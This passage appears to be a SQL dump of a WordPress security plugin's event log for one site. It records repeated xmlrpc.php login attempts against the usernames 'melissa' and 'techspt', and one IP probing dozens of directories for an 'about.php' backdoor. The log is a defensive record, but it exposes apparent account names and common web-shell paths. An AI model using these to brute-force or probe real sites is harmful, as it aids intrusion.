C2R','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.211',3091979731,'',0,1680943307.6567,10,'NQEH8g9eJl7w10oy3iIqzC2R','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('194.59.206.66',3258699330,'melissa',0,1680943361.8247,152,'NKUs5FBcl6RnE13vtPyLIwZY','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.195.105.117',868444533,'melissa',0,1680943362.1789,152,'5iA1ZDy29CKsbRYupore4VGd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.183.144.184',1152880824,'melissa',0,1680943372.0102,152,'1SaTAXDo7c8Wy6Rqb43KeuvV','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.3.1.158',1728250270,'melissa',0,1680943384.2756,152,'O9dAItTEVNsw3hRJbM2vDn7Y','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.91',1540107867,'melissa',0,1680943385.6908,152,'CsNk3pxXILVvUB7rZ62bfgio','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.98.5.146',3110208914,'melissa',0,1680943391.2543,152,'yNf84DXnv2epsJR5WOPZLAIq','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1680943396.0455,152,'e18uvXHtJoCQpFZ7kBK0OV6d','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('173.44.55.179',2905356211,'techspt',0,1680943737.0251,152,'ydeanRQfO2F1VYpLtMAk5zub','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.178.36.28',2947687452,'melissa',0,1680945097.3193,152,'2orIvTqQCS0epNyjsx9f6a7J','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.114.164.226',3228738786,'melissa',0,1680945107.1935,152,'r1fjHdEk2J6wqKlIUPz5LTVC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.183.83.210',1152865234,'melissa',0,1680945110.7189,152,'1XlBewNj6RYqnUfpJyGmCthO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.105.97.186',778658234,'melissa',0,1680945118.5673,152,'sBIqNES1oeQrpfOKZ5MG4l36','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.23.226.46',1125638702,'melissa',0,1680945119.6393,152,'5rv1Fq6MGpJXfb2ythWLuleP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1680945130.2318,152,'bWOKr1MFphgRoZ7lSyf264uk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1680945137.2377,152,'uUGWcR8rfZQxjetovs16pKXL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.156.175.51',3114053427,'techspt',0,1680946301.8572,152,'IpSqyO5Udh2u3avz76PnX8Fw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.158',1046910110,'techspt',0,1680946440.6111,152,'8FlLQIZ9twBXebAfJTuh0YPk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('210.65.139.75',3527510859,'melissa',0,1680946864.6176,152,'oVsIrjhSdyWukziTmfgA6D3N','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'melissa',0,1680946864.9600,152,'bgN3eWpGo1Z02HUk95hX6dRf','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('147.135.161.89',2475139417,'melissa',0,1680946868.1776,152,'l0i3OWgZNmQFyufz2eJEdSTH','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1680946872.5536,152,'5L6nKXetI4YdSlBH81wJMQiD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('161.97.96.198',2707513542,'melissa',0,1680946885.5188,152,'VI9wmLQ7MnaYhN152dTfRZvg','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('66.94.107.15',1113484047,'melissa',0,1680946887.0993,152,'uBzUM79yZlwKhAjFWmaveprJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('65.21.239.153',1091956633,'melissa',0,1680946888.8014,152,'ZJk9VRdt3Q7LPs560oylxhM4','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('188.68.47.117',3158585205,'melissa',0,1680946896.0063,152,'7CR2Swni1gWeaUqE86FZxKJd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.232.250.86',3119053398,'melissa',0,1680946902.1377,152,'eG6Xxf9MA7nEc3QPLDl2V1UY','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.57.230',2420914662,'melissa',0,1680946905.2305,152,'5urK4zSFpWy1BH7iQMEdcqwA','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('82.102.23.131',1382422403,'techspt',0,1680948151.4838,152,'lGr5OMi19mHkZcJe4Q8DF0LB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.96.151.132',2623575940,'techspt',0,1680949364.7300,152,'yt0unKa6r2dcYReOTPM7CGUo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.200.116.211',3116922067,'techspt',0,1680951225.9249,152,'Cui5rjDPHxMyOaFlKcEohU3L','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.181',3583549877,'techspt',0,1680951274.4756,152,'8IfBUhnuotp2dk7bP6MNSsQJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.102.28.107',1382423659,'techspt',0,1680951850.7903,152,'9mJP5Kt8Ec6uIBwlahvZTz0W','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.238.120',148041336,'melissa',0,1680951937.9411,152,'ay9YEzJtid2xQbseL4wH6Gno','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.238.120',148041336,'melissa',0,1680951948.7098,152,'QS3dEsW4NqOFiMZKo1YCabLB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.238.120',148041336,'',0,1680951948.7143,10,'QS3dEsW4NqOFiMZKo1YCabLB','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('192.114.164.226',3228738786,'melissa',0,1680951952.1680,152,'AqmiaQOZCHRjhSXM3956GEWo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.96.211',3098042579,'melissa',0,1680951952.8374,152,'KzshmRiVJAWj3SX10g62GTlE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.204.220.74',1556929610,'melissa',0,1680951956.1714,152,'TijI3OSrXzgqhdcQ0y8JE2C9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.92.235.82',1734142802,'melissa',0,1680951961.4568,152,'JaPCyNc6KjWHdvofSG8TbXwe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.52',2487806004,'melissa',0,1680951968.9845,152,'xchboCDT2R5UJGqtmBfX4r8j','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.130.104.194',763521218,'melissa',0,1680951969.5625,152,'n7EFOJXxqTbcYQa0rUPIkhpv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.152.110.52',1754820148,'melissa',0,1680951980.7066,152,'aMNuyQEV3zrK6FdwOtxX0mS5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('2.58.47.203',37367755,'techspt',0,1680954516.4874,152,'t1AFZRfrXix4PJnW0g8jkvQH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.187.195',3583556547,'techspt',0,1680954580.5903,152,'6WYUCbyO3V4nrztKeSc59isd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.145.126.115',3230760563,'techspt',0,1680954735.5323,152,'eWEFRwCJlmgIk1Si6rt7hMVY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'Melissa',3,1680957679.2205,5,'fJ603SaVLItEdABqFb8ZlPng','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('185.206.225.51',3117343027,'techspt',0,1680958217.6321,152,'I3ZMy2c7wDF1eflPnhYxbJsN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.170',3583549866,'techspt',0,1680958262.1801,152,'DXHIqcLoPEgQnbATy97SFWkz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.206.225.51',3117343027,'techspt',0,1680958504.1880,152,'rRDfh8tMqz2uew6ndlcSU7iF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.206.225.51',3117343027,'',0,1680958504.1926,10,'rRDfh8tMqz2uew6ndlcSU7iF','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('62.102.148.160',1046910112,'techspt',0,1680959576.0747,152,'duXzgpUN8maDvqrokI3TPSc7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.215.82.71',1758941767,'melissa',0,1680959962.5113,152,'XYwdokFWMsfgG1B8tZ7ai5ED','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.9.220.53',84532277,'melissa',0,1680959963.5556,152,'XYFexu78mN2Vt9iPjg36sflJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('210.65.139.75',3527510859,'melissa',0,1680959965.0399,152,'rysSUTCVZB4eGf0kKqcJR8XO','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.17.155',1556943259,'melissa',0,1680959981.6130,152,'PcQt0zKJ2WXL1YqO4M75UHmd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.140.185.41',764197161,'melissa',0,1680959987.4398,152,'PNxzaysSMhiC1WXpfF6tZmR8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('35.156.214.100',597481060,'melissa',0,1680959997.0672,152,'FytkAEUIhaQSe5W4dZ7MCHXR','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.165.236.212',3584421076,'melissa',0,1680960058.2428,152,'8pmcX04b6w2iCPTv9k3Ys7Be','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.22',1109230614,'melissa',0,1680960059.5210,152,'OnAeNdGX4gP873LfHQYpzT2k','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'melissa',0,1680960063.9052,152,'fVWL80BxCni6cOt7FJQmlIkq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.9.227.178',1728701362,'melissa',0,1680960075.5189,152,'pZvW1mLG74SU9efNbQ38qD6n','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.92.235.82',1734142802,'melissa',0,1680960078.3860,152,'7aCxdzt4Ao9yrHmDZjU5ks3Q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.159.36.10',1738482698,'melissa',0,1680960078.9222,152,'1AsS5kXnNctpCTOvVbLi08JP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.20.253.226',18152930,'melissa',0,1680960087.3052,152,'WYjFHbBATsk8Iz7flSGMyrPi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.170.40.178',1336551602,'melissa',0,1680960089.3331,152,'sAe0WfbnvLFj7qC4MZYlButw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1680960092.8630,152,'If1ObSlpnqYda0WKTNtXGhMV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.44.55.179',2905356211,'techspt',0,1680960509.9719,152,'zAxsRmjd7Lo8ugnJZPqkK9VT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.59.206.66',3258699330,'melissa',0,1680960953.7853,152,'Cr6VnqwhvAIdJxz8uYWtT34F','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1680960953.9782,152,'dZCEetTsOgJzHwAxMQNDV3Sp','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('130.69.94.131',2185584259,'melissa',0,1680960958.2115,152,'Lals5cvdR0ikZmG27xCFhuD1','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.163.200.46',3114518574,'melissa',0,1680960968.8850,152,'uSyjeGshdJL1crmZ3VbpXioW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('15.206.123.128',265190272,'melissa',0,1680963219.6692,152,'uvTGO7ZekjAWy4caJrKnSpP2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.130.104.194',763521218,'melissa',0,1680963222.6422,152,'QkReSVsu24nLrWUP5tmIlxd0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.130.104.194',763521218,'melissa',0,1680963226.1523,152,'kbghUQFVjY7xfMo8lWs56zKm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.130.104.194',763521218,'',0,1680963226.1561,10,'kbghUQFVjY7xfMo8lWs56zKm','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('207.154.253.117',3483041141,'melissa',0,1680963233.2650,152,'H5XmhcyvkNbYZOx0EIu8WDAK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('209.188.18.190',3518763710,'melissa',0,1680963237.5825,152,'bMeyzmagSo5H2I7N38RYvJQs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('94.237.124.100',1592622180,'melissa',0,1680963249.2897,152,'h1VyaXqlOcmST9pEKH8L7FGY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.238.229.54',3002000694,'techspt',0,1680963754.9654,152,'cobDAQ1gWVBMsnifhGEk56tj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('111.231.4.211',1877411027,'melissa',0,1680964226.2198,152,'jdZfqnOMX6Hx9cKBNuEIW2bJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.183.144.184',1152880824,'melissa',0,1680964230.3883,152,'TYjBL06iNyWvXsECgZq1HMOo','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'melissa',0,1680964240.0696,152,'oHsFJeTzLCwUGQaPvmi4Scf6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('188.68.47.117',3158585205,'melissa',0,1680964255.8182,152,'R5JwXZOGM1QctrshjPB9VA07','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.140.185.41',764197161,'melissa',0,1680964255.8188,152,'WqY5NmCU8Bta0kRXox6dcijg','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('163.172.168.158',2746001566,'melissa',0,1680964260.0776,152,'onrXG3qHbQfOCgMUKzesRBxS','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'melissa',0,1680964264.8074,152,'UwtCi2mOkjvxlp70JVDNBefb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.142.25.164',1737365924,'melissa',0,1680964265.5884,152,'5HK8dxD0X9sOmabLeuZJRgvP','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('193.47.61.30',3241098526,'',0,1680965319.9044,55,'NWsqjr8MeRwK6X9PZvcOFH4z','','19|0|0|0|cmdev-site1.com/wp-admin/includes/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965323.3651,55,'HPv0zNSWTkEVDoaLqI4XJCMY','','19|0|0|0|cmdev-site1.com/wp-includes/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965323.3676,10,'HPv0zNSWTkEVDoaLqI4XJCMY','','707|0|0|0|cmdev-site1.com/wp-includes/about.php',0,707,0),('193.47.61.30',3241098526,'',0,1680965335.6059,55,'FPCZROkl4t28Bf0dxzicbEmw','','19|0|0|0|cmdev-site1.com/css/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965340.2532,55,'1VmrA2tax85uJZGsMoYciHRy','','19|0|0|0|cmdev-site1.com/images/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965344.2635,55,'F6aLUNCf0D4X3KmOtheWJ9dR','','19|0|0|0|cmdev-site1.com/wp-content/languages/plugins/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965354.5050,55,'bNTlcnSd281iPwLW7uGC9ZXq','','19|0|0|0|cmdev-site1.com/wp-includes/images/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965365.0510,55,'IsbBgEkfq0H49Ppw6KiLNOuh','','19|0|0|0|cmdev-site1.com/wp-content/languages/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965367.1167,55,'j9OqnCrEpBSR3NV1yt7PDFQa','','19|0|0|0|cmdev-site1.com/wp-content/upgrade/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965368.2756,55,'hlZHyP4B2DatL0Jnfg7vVbIK','','19|0|0|0|cmdev-site1.com/wp-content/uploads/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965375.1674,55,'Lwg83ANMqJybCeGxnPuaFBfj','','19|0|0|0|cmdev-site1.com/wp-admin/js/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965376.2080,55,'FL7P4NYtOepWhg1xCs3dqzDT','','19|0|0|0|cmdev-site1.com/wp-admin/css/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965377.5264,55,'BajAL0sT148WP3lDQIkYn5Uv','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965380.1924,55,'juAZDe6qMSkOvy1mUNIdcJ8L','','19|0|0|0|cmdev-site1.com/wp-admin/maint/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965381.6957,55,'e9KugfXYkE1rBmdNh05pJWnS','','19|0|0|0|cmdev-site1.com/wp-content/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965387.6122,55,'OW8hbY0VXcyxLSEPHmRNeGt9','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/blue/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965398.0420,55,'nzHYeMgoRk6ZO4aAJbWpXyLj','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/coffee/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965399.8962,55,'e6buZM5vE8ymxBAK9dt0krNo','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/ectoplasm/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965402.9542,55,'WBH7zQ92CLoguDNdxjkvZSRU','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/midnight/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965407.6242,55,'KbXBd0rsQoxegHn7WtvqRFac','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/modern/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965428.5921,55,'jfH7CnogTa9GLWsBeQwzbqON','','19|0|0|0|cmdev-site1.com/wp-admin/images/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965431.7371,55,'0xprwSQdfnYhXj8ai4oPN1K7','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/ocean/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965434.5328,55,'RLiXcbGKW1FfAJ6ZwrVxDQgI','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965436.3792,55,'KXvJUacFoH3VOyszwfhbqD74','','19|0|0|0|cmdev-site1.com/wp-includes/customize/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965442.9537,55,'6XEsYjw75qRLP1bhSiIvkyfG','','19|0|0|0|cmdev-site1.com/wp-includes/pomo/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965454.3783,55,'LPjIc7AmrWHVbxXsw8hU04DM','','19|0|0|0|cmdev-site1.com/wp-includes/ID3/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965460.6808,55,'nmUVxqwPNIDkYdolzeFG9Zys','','19|0|0|0|cmdev-site1.com/wp-includes/IXR/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965463.0683,55,'JqL5pvGm8kCycu4tWeYFXMSd','','19|0|0|0|cmdev-site1.com/wp-includes/PHPMailer/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965467.2324,55,'2cBedxQnApkX4GvVoH93CLJw','','19|0|0|0|cmdev-site1.com/wp-includes/Requests/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965480.6091,55,'7L9KcwyETf4YO58RpGuDjqUx','','19|0|0|0|cmdev-site1.com/wp-includes/SimplePie/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965487.5374,55,'aRdZpM6jObe9lUq0Vhr1ANLf','','19|0|0|0|cmdev-site1.com/wp-includes/Text/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965488.8281,55,'6Han1ZDQksuUYL5o4wtAIvq3','','19|0|0|0|cmdev-site1.com/wp-includes/assets/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965493.1285,55,'m7nUKO29lzkafZP6QTqubJe3','','19|0|0|0|cmdev-site1.com/wp-includes/block-patterns/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965494.4196,55,'D2vkelWugcPfr6iJINS0j1Km','','19|0|0|0|cmdev-site1.com/wp-includes/block-supports/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965496.8846,55,'Y2UszMWRjNThyFSdwv51ugKf','','19|0|0|0|cmdev-site1.com/wp-includes/blocks/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965501.5700,55,'0mlOzNs3hIMLCFSJ5RxViEG1','','19|0|0|0|cmdev-site1.com/wp-includes/certificates/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965507.9775,55,'nsuvAS5dzPx7CN1WZmQ8I4jF','','19|0|0|0|cmdev-site1.com/wp-includes/css/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965512.1712,55,'6k4VTvbIM3q9WgKnFL2AehSO','','19|0|0|0|cmdev-site1.com/wp-includes/fonts/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965516.2215,55,'OtnfrqCXYRpy4JQTF0sl9VjL','','19|0|0|0|cmdev-site1.com/wp-includes/js/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965517.9331,55,'pixqbsneWCUjREg8Z0TGP4fc','','19|0|0|0|cmdev-site1.com/wp-includes/php-compat/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965519.0666,55,'ldT3SxpIAuDLm9JiMet0akUH','','19|0|0|0|cmdev-site1.com/wp-includes/random_compat/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965521.9767,55,'ugAY4RDzOGB82LcKC1Etr3Nv','','19|0|0|0|cmdev-site1.com/wp-includes/rest-api/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965523.1001,55,'7ztKmp4J8OWPMhIL2xSVRyfD','','19|0|0|0|cmdev-site1.com/wp-includes/sitemaps/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965530.8241,55,'WM8sgKf1lcXhj4F7TGzo3ADO','','19|0|0|0|cmdev-site1.com/wp-includes/sodium_compat/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965534.3739,55,'oFNz0AnM8TtwHVriPcdQXvmp','','19|0|0|0|cmdev-site1.com/wp-includes/style-engine/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965541.8211,55,'AlILiS6KPVO4oU58a27uCyYe','','19|0|0|0|cmdev-site1.com/wp-includes/theme-compat/about.php',0,19,0),('193.47.61.30',3241098526,'',0,1680965547.7998,55,'NrYei1xEBCWq7cs0DPI3LUbp','','19|0|0|0|cmdev-site1.com/wp-includes/widgets/about.php',0,19,0),('91.231.84.41',1541887017,'techspt',0,1680965685.0267,152,'Xp0h2Wmj5bIK9VleYTRqfrwk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.54.114.123',3325457019,'melissa',0,1680967999.4952,152,'rslwQGWhF4I0bE9JPoqZNV3U','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('182.92.129.110',3059515758,'melissa',0,1680968009.8477,152,'7TnhIdYAREcsQkSe6jgGMatO','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1680968010.2484,152,'M9RXjkHSW4F7IzbvBpUJtox2','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.151.196.183',3113731255,'melissa',0,1680968010.3462,152,'5IhX2RGPfVxzZA4qseBdbL19','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.22.249.133',85391749,'melissa',0,1680968018.7178,152,'Mc4n0KEz8uLV6Dmf9XCStWZF','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.98.5.176',3110208944,'melissa',0,1680968021.4491,152,'KXcdI39SmsGLaypQzZU7wYFH','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.249.226.226',922346210,'melissa',0,1680968024.6256,152,'5EA6eIbMtF14nDwUXzZq2u3c','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'melissa',0,1680968027.8815,152,'1PFmeugUV0qG52pZEKLcX3sY','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.59.206.66',3258699330,'melissa',0,1680968036.6482,152,'XYr7LlIECKhuSekH6fZ35WBx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.152.161.181',3583549877,'techspt',0,1680968289.7143,152,'NVUS23JrhHyiCDMlILk9tb4u','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.156.175.35',3114053411,'techspt',0,1680969527.3958,152,'ZmAbfTXOr9FQWuks7gCnSdRh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.154.253.117',3483041141,'melissa',0,1680972637.7794,152,'0KmzBWUgFnfq9t1hrYucEVv8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'melissa',0,1680972638.4145,152,'gaoFP2vBfh3HpMRyJ1086NbV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'melissa',0,1680972647.7991,152,'HkMZE8KXG3bvfir9jBTORJSn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.152.79.248',1738035192,'melissa',0,1680972657.2059,152,'2V5vo0H4R9GC3hSAmPn68egj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1680972660.8416,152,'8H7lf2bit5hrCQjqFW46YeTK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'melissa',0,1680972668.2860,152,'QXTZWJlxrU0psuDo85iR2SKj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'',0,1680972668.2894,10,'QXTZWJlxrU0psuDo85iR2SKj','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('66.29.132.22',1109230614,'melissa',0,1680972668.9328,152,'mNx4YderpqakglwOA8ZBQy0K','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('52.139.225.218',881582554,'melissa',0,1680972675.4447,152,'pithS75YNgQjAUdeoZaqBuK1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.249.226.226',922346210,'melissa',0,1680972943.1023,152,'InvzPFAe5Ri9Qgh6KYkW4tXT','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('104.215.82.71',1758941767,'melissa',0,1680972944.2639,152,'xZoDlOCeWFVSpmaRwAkNBv5Y','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.23.62.79',3323412047,'melissa',0,1680972951.9908,152,'OvID3rWJi6E0ZCgAVLNm7sBS','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('130.69.94.131',2185584259,'melissa',0,1680972957.2015,152,'gnf6Ydo7QAIl8OqXr53DceNz','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('123.56.69.68',2067285316,'melissa',0,1680972962.0435,152,'cWUTGtz